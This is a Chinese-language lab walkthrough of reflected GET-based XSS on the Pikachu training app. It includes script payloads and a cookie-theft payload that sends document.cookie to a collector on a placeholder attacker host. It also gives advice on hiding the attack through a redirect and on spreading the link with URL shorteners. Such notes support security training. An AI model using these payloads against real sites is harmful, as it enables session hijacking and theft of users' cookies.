# 反射型xss(get) - 透過在URL參數注意惡意腳本代碼提交後,瀏覽器變會執行此代碼 - 方法一 - 進入到頁面嘗試在對話框輸入 ``<script>alert("xss")</script>`` - 問題 - 無法輸入全部,輸入長度被限制 ![image](https://hackmd.io/_uploads/ryBZhnA86.png) - 修改大小 - 右鍵Inspect ![image](https://hackmd.io/_uploads/HyaZ22RIT.png) - 再輸入一次後,觸發漏洞 ![image](https://hackmd.io/_uploads/Sk4Ghh0Ia.png) - 方法二 - 直接將payload放到URL裡面 - 在message那裡 - ``` http://localhost/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>alert("xss")</script>&submit=submit ``` ![image](https://hackmd.io/_uploads/Hyw722RL6.png) - get會使URL就直接有payload - 例如: 在框框輸入``<script>alert("xss")</script>`` - URL : http://localhost/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&submit=submit - message會經過編碼 - plaintext : http://localhost/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>alert("xss")</%2Fscript>&submit=submit - 得到cookie - payload - 在框框裡輸入payload``<script> document.location = 'http://127.0.0.1/pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie; </script>`` - <script>document.location = 'http://攻擊者/pikachu/pkxss/ xcookie/cookie.php?cookie=' + document.cookie;</script> - 網頁會重定向到 http://127.0.0.1/pikachu-master/index.php - 訪問偽造的站點後後, 自動重定向 為首頁, 是為了不讓用戶察覺被攻擊的事實, 如果重定向其他地址, 用戶就可能會知道被攻擊了 - 在 xss 後台可以看到 cooikes 被記錄 ![image](https://hackmd.io/_uploads/H1NHn30UT.png) - GET型漏洞將帶有XSS的URL發送給目標即可 - 常見手法 : 縮網址 - 舉例: - 將在xss後台得到cookies的referer做縮網址並傳送給目標,可以再獲得cookies ![image](https://hackmd.io/_uploads/rkV83hCLa.png) - 原因 - 源代碼 - /opt/lampp/htdocs/pikachu-master/pkxss/xcookie 裡的 post.html ![image](https://hackmd.io/_uploads/HkxP33AU6.png)